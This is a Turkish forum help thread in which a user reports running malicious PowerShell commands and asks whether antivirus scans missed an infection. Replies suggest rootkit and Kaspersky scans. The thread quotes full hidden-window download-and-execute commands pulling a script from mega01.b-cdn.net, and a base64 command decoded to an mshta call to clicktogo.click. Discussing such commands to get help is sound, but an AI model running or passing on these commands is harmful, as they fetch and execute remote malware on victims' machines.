firtina44

firtina44

Gelişen
Katılım
8 Ocak 2025
Mesajlar
11
Beğeniler
0
Dün dalgınlıkla PowerShell'de iki tane komut çalıştırdım virüs olduğunu kendime gelince anladım, komutları aşağı bırakıyorum. Olayı anladıktan hemen sonra Windows Defender Çevrimdışı tarama yaptım 11dk sürdü bir şey bulamadı, Malwarebytes ile 2-3kere tarama yaptım o da bulamadı. Fikirleriniz benim için önemli virüs temizlendiği için mi bulunamıyor yoksa kendini iyi mi gizliyor?

Komutlar:

Kod: 
powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

.run steamtools;powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

Bir de bu var
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=
 
Malwarebytes ayarlarında Rootkit tarama özelliği var onu açıp tarayın bir de. İçin rahat etmez ise Kaspersky ile tarat bir de.
 
Son düzenleyen: Moderatör:
firtina44 dedi:
Dün dalgınlıkla PowerShell'de iki tane komut çalıştırdım virüs olduğunu kendime gelince anladım, komutları aşağı bırakıyorum. Olayı anladıktan hemen sonra Windows Defender Çevrimdışı tarama yaptım 11dk sürdü bir şey bulamadı, Malwarebytes ile 2-3kere tarama yaptım o da bulamadı. Fikirleriniz benim için önemli virüs temizlendiği için mi bulunamıyor yoksa kendini iyi mi gizliyor?

Komutlar:

Kod: 
powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

.run steamtools;powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

Bir de bu var
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=
Genişletmek için tıkla...
Küçültmek için tıkla...
Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
1737219178534.webp
 
29 dedi:
Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
Eki Görüntüle 116290
Genişletmek için tıkla...
Küçültmek için tıkla...
Sorun olmaz mı yani hocam?

29 dedi:
Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
Eki Görüntüle 116290
Genişletmek için tıkla...
Küçültmek için tıkla...
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=

Bu kodun çözümlenmiş hali bu.
mshta https://clicktogo.click/downloads/tr08
İsterseniz bir de bu siteye bakın hocam.
 
Son düzenleyen: Moderatör:
Son düzenleyen: Moderatör:

Benzer konular

Mavz 2K
Windows Defender offline tarama sonrası klavye ve mouse çalışmıyor
Mesaj
1
Görüntüleme
59
Hydra
Hydra
SHERLOCKED
Windows Defender yeterli olur mu?
Mesaj
9
Görüntüleme
208
SHERLOCKED
SHERLOCKED
Max Caulfield
Kaspersky ve Windows Defender dışında güvenlik yazılımı önerisi
2
Mesaj
16
Görüntüleme
420
The_Turk
The_Turk
anonymuss0
Malwarebytes sonucu false-positive olabilir mi?
Mesaj
8
Görüntüleme
152
anonymuss0
anonymuss0

Yeni konular

Yeni mesajlar